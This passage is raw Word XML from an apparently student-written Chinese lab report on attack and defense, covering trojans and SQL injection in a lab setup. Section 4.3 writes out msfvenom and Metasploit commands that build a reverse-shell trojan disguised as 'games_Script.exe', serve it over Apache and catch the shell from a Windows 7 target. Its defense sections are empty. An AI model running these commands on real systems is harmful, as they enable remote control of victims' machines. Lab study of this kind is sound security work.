          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>特洛伊木马（Trojan Horse）简称木马，在</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tooltip="计算机" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>计算机</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>领域中指的是一种</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tooltip="后门" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>后门</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId20" w:tooltip="计算机程序" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>程序</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，是</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>黑客</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>用来盗取其他用户的个人消息，甚至是远程控制对方的</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:tooltip="电子设备" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>电子设备</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>而加密制作，然后通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tooltip="传播" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>传播</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>或者骗取目标执行该程序，以达到盗取密码等各种数据资料等目的。和</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tooltip="电脑病毒" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>病毒</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>相似，木马程序有很强的</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tooltip="隐秘性（页面不存在）" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>隐秘性</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，会随著</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tooltip="操作系统" w:history="1">
        <w:r w:rsidRPr="00EB6868">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>操作系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EB6868">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>启动而启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDED812" w14:textId="70CA3477" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc76889966"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2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双方软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="6EDB966F" w14:textId="77777777" w:rsidR="00EB6868" w:rsidRPr="00C54B87" w:rsidRDefault="00EB6868" w:rsidP="00EB6868">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻方系统和软件环境：</w:t>
      </w:r>
      <w:r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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali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+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Nmap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+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Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184BBCBB" w14:textId="5E1CE5E4" w:rsidR="008C0A76" w:rsidRPr="00EB6868" w:rsidRDefault="00EB6868" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>防方系统环境：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54B87"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C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13F1CC" w14:textId="2C942362" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc76889967"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>4.3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操作步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="4A1E2B16" w14:textId="45DFD78F" w:rsidR="008C0A76" w:rsidRDefault="00EB6868" w:rsidP="008C0A76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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>利用Kali工具自动生成木马程序以后</w:t>
      </w:r>
      <w:r w:rsidR="006221AE" w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>可以在反弹shell后上传到目标主机上，这时只要目标用户开启这个程序；那么这个木马程序就会在我们开启监听以后监视目标主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DD27C" w14:textId="77777777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>工具：msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2900BD4F" w14:textId="59285A04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) </w:t>
      </w:r>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>p windows/meterpreter/reverse_tcp LHOST=192.168.x.198 LPORT=5555 -f exe &gt; games_Script.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6B4682" w14:textId="77777777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>2） service apache2 start # apache2 是web服务器 即内网网站服务器 让靶机可以访问 并且下载我们生成的木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7CB5A7" w14:textId="77777777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>3） msfconsole //启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51ABFE" w14:textId="77777777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 xml:space="preserve">4） use exploit/multi/handler //加载模块 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414037CB" w14:textId="09F04EB3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 xml:space="preserve">5） set payload windows/meterpreter/reverse_tcp//选择Payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A93EC9" w14:textId="413C4B5B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 xml:space="preserve">6） set lhost 192.168.x.198 </w:t>
      </w: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 xml:space="preserve">//这里的地址设置成我们刚才生成木马的IP地址 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA8F45" w14:textId="77777777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 xml:space="preserve">7） set lport 9999 </w:t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  <w:t xml:space="preserve">//这里的端口设置成刚才我们生成木马所监听的端口 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D57A0" w14:textId="6E93BD4B" w:rsidR="006221AE" w:rsidRPr="006221AE" w:rsidRDefault="006221AE" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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 xml:space="preserve">8） exploit </w:t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  <w:t>//开始执行漏洞，开始监听,等待 Win 7主机上线</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342FEEFC" w14:textId="0267C596" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc76889968"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.4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验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="6213AFC1" w14:textId="574E36A8" w:rsidR="008C0A76" w:rsidRPr="006221AE" w:rsidRDefault="006221AE" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>验证成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，我们成功通过反弹的shell监视目标主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF00527" w14:textId="284A7C06" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc76889969"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>4.5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防守措施</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="4C84B4CA" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C026735" w14:textId="1A189595" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc76889970"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>4.6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再次验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="3C2F33B2" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB5B138" w14:textId="77777777" w:rsidR="005E252A" w:rsidRPr="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A"/>
    <w:p w14:paraId="53F70920" w14:textId="37F833EA" w:rsidR="00A45519" w:rsidRPr="00A72932" w:rsidRDefault="00A45519" w:rsidP="00A45519">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc76889971"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="5293BDA0" w14:textId="79DF00D6" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc76889972"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>5.1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原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="7B301563" w14:textId="087E8C70" w:rsidR="008C0A76" w:rsidRPr="006221AE" w:rsidRDefault="006221AE" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL注入即是指</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006221AE">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>web应用程序</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006221AE">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>SQL语句</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，在管理员不知情的情况下实现非法操作，以此来实现欺骗</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006221AE">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>数据库服务器</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>执行非授权的任意查询，从而进一步得到相应的数据信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE9758" w14:textId="7EB17CB5" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc76889973"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>5.2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双方软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="6B4D1C5E" w14:textId="77777777" w:rsidR="006221AE" w:rsidRPr="006221AE" w:rsidRDefault="006221AE" w:rsidP="006221AE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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻方系统和软件环境：</w:t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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali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+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Nmap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+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Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A34CB" w14:textId="342718DD" w:rsidR="008C0A76" w:rsidRPr="006221AE" w:rsidRDefault="006221AE" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>防方系统环境：</w:t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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60B3E1" w14:textId="4486E876" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc76889974"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.3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操作步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="0690BF54" w14:textId="0763B006" w:rsidR="00AF2C62" w:rsidRDefault="00AF2C62" w:rsidP="00AF2C62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C25489C" wp14:editId="6D5F7FCE">
            <wp:extent cx="4210886" cy="236670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886" cy="23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846A" w14:textId="77777777" w:rsidR="00F755A7" w:rsidRPr="00AF2C62" w:rsidRDefault="00F755A7" w:rsidP="00AF2C62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1387A049" w14:textId="63A46042" w:rsidR="008C0A76" w:rsidRDefault="006221AE" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>运用X</w:t>
      </w:r>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mPP</w:t>
      </w:r>
      <w:r w:rsidR="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（网站环境）</w:t>
      </w:r>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqli-labs</w:t>
      </w:r>
      <w:r w:rsidR="0031259D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（网站代码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC217CC" w14:textId="3A17B318" w:rsidR="00AF2C62" w:rsidRPr="0031259D" w:rsidRDefault="0031259D" w:rsidP="008C0A76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模拟在目标主机上搭建好模拟环境，开启Xampp的Mysql和Web服务器；然后我们在与目标主机在同一内网的主机上URL框内输入域名或者Ip进行访问；模拟简单的Sql注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE19F52" w14:textId="551CC126" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc76889975"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>5.4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验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="4B2AA439" w14:textId="40493DB0" w:rsidR="008C0A76" w:rsidRDefault="0031259D" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2C62">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>验证成功，我们可以通过在URL栏插入Sql语句的方法进行</w:t>
      </w:r>
      <w:r w:rsidR="00AF2C62" w:rsidRPr="00AF2C62">
        <w:rPr>
